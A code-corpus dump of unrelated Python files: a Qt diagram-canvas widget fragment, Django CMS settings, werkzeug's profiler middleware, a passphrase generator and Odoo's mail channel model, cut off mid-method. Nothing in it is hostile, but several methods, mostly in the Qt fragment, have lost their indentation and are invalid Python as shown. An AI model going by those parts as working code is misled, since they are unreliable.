            # interaction, then the press is handled by Qt as usual.
            if self.__mouse_down:
                self.mouseReleaseEvent(event)
            super().mousePressEvent(event)
def mouseMoveEvent(self, event):
pos = event.pos()
point = Point(pos.x(), pos.y())
self.__drawing_area.mouse_move(
point,
QApplication.keyboardModifiers() == Qt.ControlModifier,
QApplication.keyboardModifiers() == Qt.ShiftModifier
)
if self.__drawing_area.action_active:
self.__do_update()
else:
self.__update_cursor()
def mouseReleaseEvent(self, event):
pos = event.pos()
point = Point(pos.x(), pos.y())
if self.__mouse_down:
self.__drawing_area.mouse_up(
point,
QApplication.keyboardModifiers() == Qt.ControlModifier,
QApplication.keyboardModifiers() == Qt.ShiftModifier
)
self.__mouse_down = False
self.__do_update()
else:
super().mousePressEvent(event)
    def mouseDoubleClickEvent(self, event):
        """Invoke the default action for the double-clicked visual.

        Depending on the element type this opens its properties dialog or
        switches to one of its sub-diagrams.
        """
        pos = event.pos()
        point = Point(pos.x(), pos.y())
        self.__drawing_area.ensure_selection_at(point)
        # Only act when exactly one visual is selected.
        visual = self.__drawing_area.selection.get_lonely_selected_visual()
        if visual is None:
            return
        if not visual.object.has_ufl_dialog:
            return
        # Cancel any drawing action in progress before opening a dialog.
        self.__drawing_area.set_action(None)
        self.unsetCursor()
        if not isinstance(visual, ElementVisual):
            # Non-element visuals (connections) only offer properties.
            PropertiesDialog.open_for(self.__main_window, visual.object)
        elif visual.object.type.default_action == DefaultElementAction.properties:
            PropertiesDialog.open_for(self.__main_window, visual.object)
        elif visual.object.type.default_action == DefaultElementAction.subdiagram:
            # Jump to the first sub-diagram other than the one shown here;
            # the for-else falls back to the properties dialog when no such
            # diagram exists.
            for diagram in visual.object.diagrams:
                if diagram is not self.__drawing_area.diagram:
                    Application().tabs.select_tab(diagram)
                    break
            else:
                PropertiesDialog.open_for(self.__main_window, visual.object)
def wheelEvent(self, event):
delta = event.angleDelta()
if delta.x() == 0 and delta.y() != 0 and event.modifiers() == Qt.ControlModifier:
if delta.y() > 0:
self.__drawing_area.zoom_in()
else:
self.__drawing_area.zoom_out()
else:
super().wheelEvent(event)
    def contextMenuEvent(self, event):
        """Show the context menu matching the current selection kind."""
        if event.reason() == QContextMenuEvent.Mouse:
            # Mouse-triggered menus first select whatever is under the
            # cursor; keyboard-triggered menus use the selection as-is.
            pos = event.pos()
            point = Point(pos.x(), pos.y())
            self.__drawing_area.ensure_selection_at(point)
        self.unsetCursor()
        if self.__drawing_area.selection.is_element_selected:
            menu = CanvasElementMenu(self.__main_window, self.__drawing_area,
                                     self.__drawing_area.selection.selected_elements)
        elif self.__drawing_area.selection.is_connection_selected:
            menu = CanvasConnectionMenu(self.__main_window, self.__drawing_area,
                                        self.__drawing_area.selection.selected_connection)
        elif self.__drawing_area.selection.is_diagram_selected:
            menu = CanvasDiagramMenu(self.__main_window, self.__drawing_area,
                                     self.__drawing_area.selection.selected_diagram)
        else:
            # The selection is always exactly one of the three kinds above.
            raise Exception
        menu_pos = event.globalPos()
        menu.exec_(menu_pos)
def dragEnterEvent(self, event):
mime_data = event.mimeData()
if isinstance(mime_data, ProjectMimeData) and isinstance(mime_data.model_object, ElementObject):
if mime_data.model_object.project is self.diagram.parent.project:
event.acceptProposedAction()
def dropEvent(self, event):
mime_data = event.mimeData()
if isinstance(mime_data, ProjectMimeData) and isinstance(mime_data.model_object, ElementObject):
pos = event.pos()
point = Point(pos.x(), pos.y())
element = mime_data.model_object
command = ShowElementCommand(self.diagram, element, point)
Application().commands.execute(command)
def __hide_object(self):
if self.__drawing_area.selection.selected_elements:
command = HideElementsCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements)
Application().commands.execute(command)
elif self.__drawing_area.selection.selected_connection:
command = HideConnectionCommand(self.__drawing_area.diagram,
self.__drawing_area.selection.selected_connection)
Application().commands.execute(command)
def __delete_object(self):
if self.__drawing_area.selection.selected_elements:
command = DeleteElementsCommand(
tuple(element.object for element in self.__drawing_area.selection.selected_elements)
)
Application().commands.execute(command)
elif self.__drawing_area.selection.selected_connection:
command = DeleteConnectionCommand(self.__drawing_area.selection.selected_connection)
Application().commands.execute(command)
def __z_order_back(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.bellow)
Application().commands.execute(command)
def __z_order_forward(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.above)
Application().commands.execute(command)
def __z_order_bottom(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.bottom)
Application().commands.execute(command)
def __z_order_top(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.top)
Application().commands.execute(command)
    def __cancel_action(self):
        # Abort the drawing area's pending action and repaint so any
        # on-canvas action feedback disappears.
        self.__drawing_area.reset_action()
        self.__do_update()
    def __do_update(self):
        # Repaint and refresh all derived widget state; called after any
        # interaction that may have changed the diagram or the selection.
        self.update()
        self.__update_size()
        self.__update_cursor()
        self.__show_menu_if_needed()
def __update_size(self):
size = self.__drawing_area.get_size(Application().ruler)
self.setMinimumSize(QSize(size.width, size.height))
def __update_cursor(self):
if self.__old_cursor == self.__drawing_area.cursor:
return
if self.__drawing_area.cursor == DrawingAreaCursor.arrow:
self.unsetCursor()
elif self.__drawing_area.cursor == DrawingAreaCursor.move:
self.setCursor(Qt.SizeAllCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.main_diagonal_resize:
self.setCursor(Qt.SizeFDiagCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.anti_diagonal_resize:
self.setCursor(Qt.SizeBDiagCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.vertical_resize:
self.setCursor(Qt.SizeVerCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.horizontal_resize:
self.setCursor(Qt.SizeHorCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.cross:
self.setCursor(Qt.CrossCursor)
self.__old_cursor = self.__drawing_area.cursor
def __show_menu_if_needed(self):
menu = self.__drawing_area.menu_to_show
if menu is None:
return
action_menu = ActionMenu(self.__drawing_area, menu)
action_menu.do()
    def __something_changed(self, event):
        # Generic change handler: any model/diagram event triggers a refresh.
        self.__do_update()
| gpl-3.0 |
wilima/Semantic-CMS | semantic_cms/semantic_cms/settings/base.py | 1 | 4802 | """
Django settings for semantic_cms project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# SECURITY WARNING: don't run with debug turned on in production!
# TEMPLATE_DEBUG is the pre-Django-1.8 alias, kept in sync with DEBUG.
TEMPLATE_DEBUG = DEBUG = False
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# three dirname() calls climb from settings/base.py up to the project root
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# The key is read from a file outside the repository so it never enters VCS.
with open('/etc/secret_key.txt') as f:
    SECRET_KEY = f.read().strip()
# NOTE(review): empty ALLOWED_HOSTS with DEBUG=False makes Django reject every
# request -- presumably overridden in an environment-specific settings module;
# confirm before deploying.
ALLOWED_HOSTS = []
# sessions expire after 3 hours (10800 seconds)
SESSION_COOKIE_AGE = 10800
# Application definition
INSTALLED_APPS = (
    # stock admin is disabled; the project ships its own admin UI
    # (see 'semantic_admin' below) -- presumably intentional, confirm.
    # 'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Third-party apps
    'django_dag',
    'widget_tweaks',
    'datetimewidget',
    'taggit',
    'django_filters',
    'rest_framework',
    'redactor',
    'imagekit',
    'betterforms',
    'password_reset',
    # Project apps
    'article',
    'semantic',
    'keywords',
    'flags',
    'semantic_admin',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'semantic_cms.urls'
# project-level template directory, searched in addition to app templates
t_path = os.path.join(BASE_DIR, 'templates')
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            t_path
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
                # list if you haven't customized them:
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.request',
                # project-wide variables injected into every template
                'context_processors.semantic_cms.basic',
            ],
        },
    },
]
WSGI_APPLICATION = 'semantic_cms.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
FILE_CHARSET = 'utf-8'
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Prague'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Media locations
# media_root_path = os.path.join(BASE_DIR, 'media/')
# # media_url_path = os.path.join(BASE_DIR, 'media/')
# media_url_path = '/media/'
# user-uploaded files live under <project root>/media/
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
MEDIA_URL = '/media/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
# STATIC_ROOT = BASE_DIR
# STATIC_URL = '/static/'
STATIC_URL = '/static/'
# STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
# extra (non-app) static file location searched by collectstatic/runserver
staticfiles_path = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = (
    staticfiles_path,
)
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# authentication flows go through the project's custom admin interface
LOGIN_REDIRECT_URL = '/admin/'
LOGIN_URL = '/admin/login'
LOGOUT_URL = '/admin/logout'
# TAGGIT_AUTOCOMPLETE_JS_BASE_URL = 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.4/jquery-ui.min.js'
# REST_FRAMEWORK = {
# 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),
# }
# WYSIWYG editor (django-redactor) configuration
REDACTOR_OPTIONS = {'lang': 'en'}
REDACTOR_UPLOAD = 'image/uploads/'
REDACTOR_UPLOAD_HANDLER = 'redactor.handlers.DateDirectoryUploader'
# NOTE(review): a constance backend is configured but 'constance' is not in
# INSTALLED_APPS above -- confirm the app is registered elsewhere.
CONSTANCE_BACKEND = 'constance.backends.database.DatabaseBackend'
| gpl-2.0 |
adamchalmers/threesomes_web | lib/werkzeug/contrib/profiler.py | 315 | 4920 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.profiler
~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides a simple WSGI profiler middleware for finding
bottlenecks in web application. It uses the :mod:`profile` or
:mod:`cProfile` module to do the profiling and writes the stats to the
stream provided (defaults to stderr).
Example usage::
from werkzeug.contrib.profiler import ProfilerMiddleware
app = ProfilerMiddleware(app)
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import sys, time, os.path
try:
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from pstats import Stats
available = True
except ImportError:
available = False
class MergeStream(object):
    """Duplicate every `write` call onto a group of streams.

    Handy for logging to several destinations at once, e.g. both
    `sys.stdout` and a file::

        f = open('profiler.log', 'w')
        stream = MergeStream(sys.stdout, f)
        profiler = ProfilerMiddleware(app, stream)
    """

    def __init__(self, *streams):
        if not streams:
            raise TypeError('at least one stream must be given')
        self.streams = streams

    def write(self, data):
        # fan the payload out to every registered stream, in order
        for target in self.streams:
            target.write(data)
class ProfilerMiddleware(object):
    """Simple profiler middleware. Wraps a WSGI application and profiles
    a request. This intentionally buffers the response so that timings are
    more exact.
    By giving the `profile_dir` argument, pstat.Stats files are saved to that
    directory, one file per request. Without it, a summary is printed to
    `stream` instead.
    For the exact meaning of `sort_by` and `restrictions` consult the
    :mod:`profile` documentation.
    .. versionadded:: 0.9
       Added support for `restrictions` and `profile_dir`.
    :param app: the WSGI application to profile.
    :param stream: the stream for the profiled stats. defaults to stderr.
    :param sort_by: a tuple of columns to sort the result by.
    :param restrictions: a tuple of profiling strictions, not used if dumping
                         to `profile_dir`.
    :param profile_dir: directory name to save pstat files
    """
    def __init__(self, app, stream=None,
                 sort_by=('time', 'calls'), restrictions=(), profile_dir=None):
        # `available` is set at import time depending on whether
        # profile/cProfile and pstats could be imported.
        if not available:
            raise RuntimeError('the profiler is not available because '
                               'profile or pstat is not installed.')
        self._app = app
        # NOTE(review): despite the docstring saying "defaults to stderr",
        # the actual fallback is sys.stdout -- kept as-is to preserve behavior.
        self._stream = stream or sys.stdout
        self._sort_by = sort_by
        self._restrictions = restrictions
        self._profile_dir = profile_dir
    def __call__(self, environ, start_response):
        # Buffer the entire response body so the measured time covers both
        # the app call and the iteration of its response iterable.
        response_body = []
        def catching_start_response(status, headers, exc_info=None):
            start_response(status, headers, exc_info)
            return response_body.append
        def runapp():
            appiter = self._app(environ, catching_start_response)
            response_body.extend(appiter)
            if hasattr(appiter, 'close'):
                appiter.close()
        p = Profile()
        start = time.time()
        p.runcall(runapp)
        # NOTE(review): joining with '' assumes str chunks (Python 2-era WSGI);
        # a Python 3 WSGI app yields bytes -- confirm the target interpreter.
        body = ''.join(response_body)
        elapsed = time.time() - start
        if self._profile_dir is not None:
            # one pstats dump per request, named
            # <METHOD>.<dotted.path>.<elapsed>ms.<timestamp>.prof
            prof_filename = os.path.join(self._profile_dir,
                                         '%s.%s.%06dms.%d.prof' % (
                environ['REQUEST_METHOD'],
                environ.get('PATH_INFO').strip('/').replace('/', '.') or 'root',
                elapsed * 1000.0,
                time.time()
            ))
            p.dump_stats(prof_filename)
        else:
            # no directory given: print a human-readable summary to the stream
            stats = Stats(p, stream=self._stream)
            stats.sort_stats(*self._sort_by)
            self._stream.write('-' * 80)
            self._stream.write('\nPATH: %r\n' % environ.get('PATH_INFO'))
            stats.print_stats(*self._restrictions)
            self._stream.write('-' * 80 + '\n\n')
        return [body]
def make_action(app_factory, hostname='localhost', port=5000,
                threaded=False, processes=1, stream=None,
                sort_by=('time', 'calls'), restrictions=()):
    """Return a new callback for :mod:`werkzeug.script` that starts a local
    server with the profiler enabled.
    ::
        from werkzeug.contrib import profiler
        action_profile = profiler.make_action(make_app)
    """
    # The ('h', hostname) / ('p', port) defaults follow the werkzeug.script
    # convention: (short option letter, default value).
    def action(hostname=('h', hostname), port=('p', port),
               threaded=threaded, processes=processes):
        """Start a new development server."""
        # imported lazily so merely creating the action has no side effects
        from werkzeug.serving import run_simple
        app = ProfilerMiddleware(app_factory(), stream, sort_by, restrictions)
        run_simple(hostname, port, app, False, None, threaded, processes)
    return action
| apache-2.0 |
lungj/passphrase_generator | passer.py | 1 | 1545 | #!/usr/bin/env python2
'''
Passphrase generator.
Copyright (C) 2015 jonathan lung <lungj+git@heresjono.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
Uses Python 2 for compatibility with the Pattern module.
Requires the following packages:
* pattern
* nltk
Both packages are available via pip.
'''
from __future__ import division, with_statement, print_function, generators
import sys
import entropy.random as random
import generators.wordnet
# Script entry point.  With one command-line argument, random values are read
# from stdin instead of the OS entropy source; the argument is the largest
# value the external source can produce (e.g. 5 for a die numbered 0-5).
if __name__ == '__main__':
    if len(sys.argv) == 2:
        print("Using stdin as source of space-delimited random values in the "
              "range 0-%i in base ten." % int(sys.argv[1]))
        # swap the entropy source consumed by the phrase generators
        random.urandom = random.argv_random(int(sys.argv[1]))
    phrase, entropy = generators.wordnet.generate_phrase_2()
    print('%0.2f bits of entropy' % entropy)
print(phrase) | gpl-2.0 |
web30s/odoo-9.0c-20160402 | hello/templates/openerp/addons/mail/models/mail_channel.py | 2 | 31100 | # -*- coding: utf-8 -*-
from email.utils import formataddr
import datetime
import uuid
from openerp import _, api, fields, models, modules, tools
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.exceptions import UserError
from openerp.osv import expression
from openerp.addons.bus.models.bus_presence import AWAY_TIMER
class ChannelPartner(models.Model):
    """ Membership of a partner in a mail.channel, together with the
        per-partner UI state of the conversation (last message seen,
        chat-window fold state, pinned flag). """
    _name = 'mail.channel.partner'
    _description = 'Last Seen Many2many'
    _table = 'mail_channel_partner'
    _rec_name = 'partner_id'
    partner_id = fields.Many2one('res.partner', string='Recipient', ondelete='cascade')
    channel_id = fields.Many2one('mail.channel', string='Channel', ondelete='cascade')
    # last message this partner has read in the channel
    seen_message_id = fields.Many2one('mail.message', string='Last Seen')
    fold_state = fields.Selection([('open', 'Open'), ('folded', 'Folded'), ('closed', 'Closed')], string='Conversation Fold State', default='open')
    # fixed typo in the user-facing label ("minimied" -> "minimized")
    is_minimized = fields.Boolean("Conversation is minimized")
    is_pinned = fields.Boolean("Is pinned on the interface", default=True)
class Channel(models.Model):
    """ A mail.channel is a discussion group that may behave like a listener
    on documents. """
    _description = 'Discussion channel'
    _name = 'mail.channel'
    # messages posted on a channel are not displayed as one flat thread
    _mail_flat_thread = False
    # read access on the channel is enough to be allowed to post on it
    _mail_post_access = 'read'
    _inherit = ['mail.thread']
    # delegation inheritance: each channel owns a mail.alias record
    _inherits = {'mail.alias': 'alias_id'}
def _get_default_image(self):
image_path = modules.get_module_resource('mail', 'static/src/img', 'groupdefault.png')
return tools.image_resize_image_big(open(image_path, 'rb').read().encode('base64'))
name = fields.Char('Name', required=True, translate=True)
channel_type = fields.Selection([
('chat', 'Chat Discussion'),
('channel', 'Channel')],
'Channel Type', default='channel')
description = fields.Text('Description')
uuid = fields.Char('UUID', size=50, select=True, default=lambda self: '%s' % uuid.uuid4())
email_send = fields.Boolean('Send messages by email', default=False)
# multi users channel
channel_last_seen_partner_ids = fields.One2many('mail.channel.partner', 'channel_id', string='Last Seen')
channel_partner_ids = fields.Many2many('res.partner', 'mail_channel_partner', 'channel_id', 'partner_id', string='Listeners')
channel_message_ids = fields.Many2many('mail.message', 'mail_message_mail_channel_rel')
is_member = fields.Boolean('Is a member', compute='_compute_is_member')
# access
public = fields.Selection([
('public', 'Everyone'),
('private', 'Invited people only'),
('groups', 'Selected group of users')],
'Privacy', required=True, default='groups',
help='This group is visible by non members. Invisible groups can add members through the invite button.')
group_public_id = fields.Many2one('res.groups', string='Authorized Group',
default=lambda self: self.env.ref('base.group_user'))
group_ids = fields.Many2many(
'res.groups', rel='mail_channel_res_group_rel',
id1='mail_channel_id', id2='groups_id', string='Auto Subscription',
help="Members of those groups will automatically added as followers. "
"Note that they will be able to manage their subscription manually "
"if necessary.")
# image: all image fields are base64 encoded and PIL-supported
image = fields.Binary("Photo", default=_get_default_image, attachment=True,
help="This field holds the image used as photo for the group, limited to 1024x1024px.")
image_medium = fields.Binary('Medium-sized photo', attachment=True,
help="Medium-sized photo of the group. It is automatically "
"resized as a 128x128px image, with aspect ratio preserved. "
"Use this field in form views or some kanban views.")
image_small = fields.Binary('Small-sized photo', attachment=True,
help="Small-sized photo of the group. It is automatically "
"resized as a 64x64px image, with aspect ratio preserved. "
"Use this field anywhere a small image is required.")
alias_id = fields.Many2one(
'mail.alias', 'Alias', ondelete="restrict", required=True,
help="The email address associated with this group. New emails received will automatically create new topics.")
@api.multi
def _compute_is_member(self):
memberships = self.env['mail.channel.partner'].sudo().search([
('channel_id', 'in', self.ids),
('partner_id', '=', self.env.user.partner_id.id),
])
membership_ids = memberships.mapped('channel_id')
for record in self:
record.is_member = record in membership_ids
    @api.model
    def create(self, vals):
        """ Create the channel together with its mail.alias, auto-subscribe
        group members, and make the channel follow itself so posts on it
        notify its listeners. """
        tools.image_resize_images(vals)
        # Create channel and alias
        channel = super(Channel, self.with_context(
            alias_model_name=self._name, alias_parent_model_name=self._name, mail_create_nolog=True, mail_create_nosubscribe=True)
        ).create(vals)
        # route emails received on the alias back to this very channel
        channel.alias_id.write({"alias_force_thread_id": channel.id, 'alias_parent_thread_id': channel.id})
        if vals.get('group_ids'):
            channel._subscribe_users()
        # make channel listen itself: posting on a channel notifies the channel
        if not self._context.get('mail_channel_noautofollow'):
            channel.message_subscribe(channel_ids=[channel.id])
        return channel
    @api.multi
    def unlink(self):
        """ Delete channels and cascade-delete their mail aliases.

        Raises UserError when trying to delete the 'Whole Company' channel,
        which other modules rely on.
        """
        aliases = self.mapped('alias_id')
        # Delete mail.channel
        try:
            all_emp_group = self.env.ref('mail.channel_all_employees')
        except ValueError:
            # reference data was removed: nothing to protect
            all_emp_group = None
        if all_emp_group and all_emp_group in self:
            raise UserError(_('You cannot delete those groups, as the Whole Company group is required by other modules.'))
        res = super(Channel, self).unlink()
        # Cascade-delete mail aliases as well, as they should not exist without the mail.channel.
        aliases.sudo().unlink()
        return res
    @api.multi
    def write(self, vals):
        """ Resize incoming images and refresh group auto-subscriptions
        when the subscription groups change. """
        tools.image_resize_images(vals)
        result = super(Channel, self).write(vals)
        if vals.get('group_ids'):
            self._subscribe_users()
        return result
def _subscribe_users(self):
for mail_channel in self:
mail_channel.write({'channel_partner_ids': [(4, pid) for pid in mail_channel.mapped('group_ids').mapped('users').mapped('partner_id').ids]})
    @api.multi
    def action_follow(self):
        """ Make the current user's partner join the channel.

        Returns the result of the membership write, or None when the
        partner is already a member (nothing to do). """
        self.ensure_one()
        channel_partner = self.mapped('channel_last_seen_partner_ids').filtered(lambda cp: cp.partner_id == self.env.user.partner_id)
        if not channel_partner:
            return self.write({'channel_last_seen_partner_ids': [(0, 0, {'partner_id': self.env.user.partner_id.id})]})
    @api.multi
    def action_unfollow(self):
        """ Remove the current user's partner from the channel, push an
        'unsubscribe' header to the user over the bus and, for non
        mailing-list channels, post a 'left' message in the channel. """
        partner_id = self.env.user.partner_id.id
        channel_info = self.channel_info('unsubscribe')[0]  # must be computed before leaving the channel (access rights)
        result = self.write({'channel_partner_ids': [(3, partner_id)]})
        self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', partner_id), channel_info)
        if not self.email_send:
            notification = _('<div class="o_mail_notification">left <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (self.id, self.name,)
            # post 'channel left' message as root since the partner just unsubscribed from the channel
            self.sudo().message_post(body=notification, message_type="notification", subtype="mail.mt_comment", author_id=partner_id)
        return result
    @api.multi
    def _notification_group_recipients(self, message, recipients, done_ids, group_data):
        """ All recipients of a message on a channel are considered as partners.
        This means they will receive a minimal email, without a link to access
        in the backend. Mailing lists should indeed send minimal emails to avoid
        the noise. """
        # force every recipient into the 'partner' group and mark it handled
        for recipient in recipients:
            group_data['partner'] |= recipient
            done_ids.add(recipient.id)
        return super(Channel, self)._notification_group_recipients(message, recipients, done_ids, group_data)
    @api.multi
    def message_get_email_values(self, notif_mail=None):
        """ Add mailing-list style headers to notification emails sent for
        this channel (Precedence, List-Id, List-Post, X-Forge-To, ...). """
        self.ensure_one()
        res = super(Channel, self).message_get_email_values(notif_mail=notif_mail)
        headers = {}
        if res.get('headers'):
            try:
                # NOTE(review): headers are stored as a repr()'d dict and
                # re-read with eval(); safe only while the stored value is
                # always generated internally -- confirm no external writer.
                headers.update(eval(res['headers']))
            except Exception:
                # best effort: ignore malformed stored headers
                pass
        headers['Precedence'] = 'list'
        # avoid out-of-office replies from MS Exchange
        # http://blogs.technet.com/b/exchange/archive/2006/10/06/3395024.aspx
        headers['X-Auto-Response-Suppress'] = 'OOF'
        if self.alias_domain and self.alias_name:
            headers['List-Id'] = '%s.%s' % (self.alias_name, self.alias_domain)
            headers['List-Post'] = '<mailto:%s@%s>' % (self.alias_name, self.alias_domain)
            # Avoid users thinking it was a personal message
            # X-Forge-To: will replace To: after SMTP envelope is determined by ir.mail.server
            list_to = '"%s" <%s@%s>' % (self.name, self.alias_name, self.alias_domain)
            headers['X-Forge-To'] = list_to
        res['headers'] = repr(headers)
        return res
    @api.multi
    def message_get_recipient_values(self, notif_message=None, recipient_ids=None):
        """ Build recipient values for outgoing notifications; mailing-list
        channels address all recipients in a single email (the actual To:
        is later replaced via the X-Forge-To header). """
        # real mailing list: multiple recipients (hidden by X-Forge-To)
        if self.alias_domain and self.alias_name:
            return {
                'email_to': ','.join(formataddr((partner.name, partner.email)) for partner in self.env['res.partner'].sudo().browse(recipient_ids)),
                'recipient_ids': [],
            }
        return super(Channel, self).message_get_recipient_values(notif_message=notif_message, recipient_ids=recipient_ids)
    @api.multi
    @api.returns('self', lambda value: value.id)
    def message_post(self, body='', subject=None, message_type='notification', subtype=None, parent_id=False, attachments=None, content_subtype='html', **kwargs):
        """ Post a message on the channel: re-pins chat sessions and applies
        text shortcodes before delegating to mail.thread. """
        # auto pin 'direct_message' channel partner
        self.filtered(lambda channel: channel.channel_type == 'chat').mapped('channel_last_seen_partner_ids').write({'is_pinned': True})
        # apply shortcode (text only) substitution
        body = self.env['mail.shortcode'].apply_shortcode(body, shortcode_type='text')
        message = super(Channel, self.with_context(mail_create_nosubscribe=True)).message_post(body=body, subject=subject, message_type=message_type, subtype=subtype, parent_id=parent_id, attachments=attachments, content_subtype=content_subtype, **kwargs)
        return message
#------------------------------------------------------
# Instant Messaging API
#------------------------------------------------------
# A channel header should be broadcasted:
# - when adding user to channel (only to the new added partners)
# - when folding/minimizing a channel (only to the user making the action)
# A message should be broadcasted:
# - when a message is posted on a channel (to the channel, using _notify() method)
# Anonymous method
@api.multi
def _broadcast(self, partner_ids):
""" Broadcast the current channel header to the given partner ids
:param partner_ids : the partner to notify
"""
notifications = self._channel_channel_notifications(partner_ids)
self.env['bus.bus'].sendmany(notifications)
    @api.multi
    def _channel_channel_notifications(self, partner_ids):
        """ Generate the bus notifications of current channel for the given partner ids
            :param partner_ids : the partners to send the current channel header to
            :returns list of bus notifications (tuple (bus_channel, message_content))
        """
        notifications = []
        for partner in self.env['res.partner'].browse(partner_ids):
            user_id = partner.user_ids and partner.user_ids[0] or False
            if user_id:
                # build the header as that user so access rules apply;
                # partners without a user cannot receive bus notifications
                for channel_info in self.sudo(user_id).channel_info():
                    notifications.append([(self._cr.dbname, 'res.partner', partner.id), channel_info])
        return notifications
    @api.multi
    def _notify(self, message):
        """ Broadcast the given message on the current channels.
            Send the message on the Bus Channel (uuid for public mail.channel, and partner private bus channel (the tuple)).
            A partner will receive only one message on its bus channel, even if this message belongs to multiple mail channels. Then the 'channel_ids' field
            of the received message indicates on which mail channel the message should be displayed.
            :param message : mail.message to broadcast
        """
        message.ensure_one()
        notifications = self._channel_message_notifications(message)
        self.env['bus.bus'].sendmany(notifications)
    @api.multi
    def _channel_message_notifications(self, message):
        """ Generate the bus notifications for the given message
            :param message : the mail.message to send
            :returns list of bus notifications (tuple (bus_channel, message_content))
        """
        message_values = message.message_format()[0]
        notifications = []
        for channel in self:
            # each notification gets its own copy of the payload dict
            notifications.append([(self._cr.dbname, 'mail.channel', channel.id), dict(message_values)])
            # add uuid to allow anonymous to listen
            if channel.public == 'public':
                notifications.append([channel.uuid, dict(message_values)])
        return notifications
    @api.multi
    def channel_info(self, extra_info = False):
        """ Get the informations header for the current channels
            :param extra_info : optional marker copied into each header's
                                'info' key (e.g. 'unsubscribe')
            :returns a list of channels values
            :rtype : list(dict)
        """
        channel_infos = []
        partner_channels = self.env['mail.channel.partner']
        # find the channel partner state, if logged user
        if self.env.user and self.env.user.partner_id:
            partner_channels = self.env['mail.channel.partner'].search([('partner_id', '=', self.env.user.partner_id.id), ('channel_id', 'in', self.ids)])
        # for each channel, build the information header and include the logged partner information
        for channel in self:
            info = {
                'id': channel.id,
                'name': channel.name,
                'uuid': channel.uuid,
                'state': 'open',
                'is_minimized': False,
                'channel_type': channel.channel_type,
                'public': channel.public,
                'mass_mailing': channel.email_send,
            }
            if extra_info:
                info['info'] = extra_info
            # add the partner for 'direct mesage' channel
            if channel.channel_type == 'chat':
                # active_test=False so archived correspondents still show up
                info['direct_partner'] = (channel.sudo()
                                          .with_context(active_test=False)
                                          .channel_partner_ids
                                          .filtered(lambda p: p.id != self.env.user.partner_id.id)
                                          .read(['id', 'name', 'im_status']))
            # add user session state, if available and if user is logged
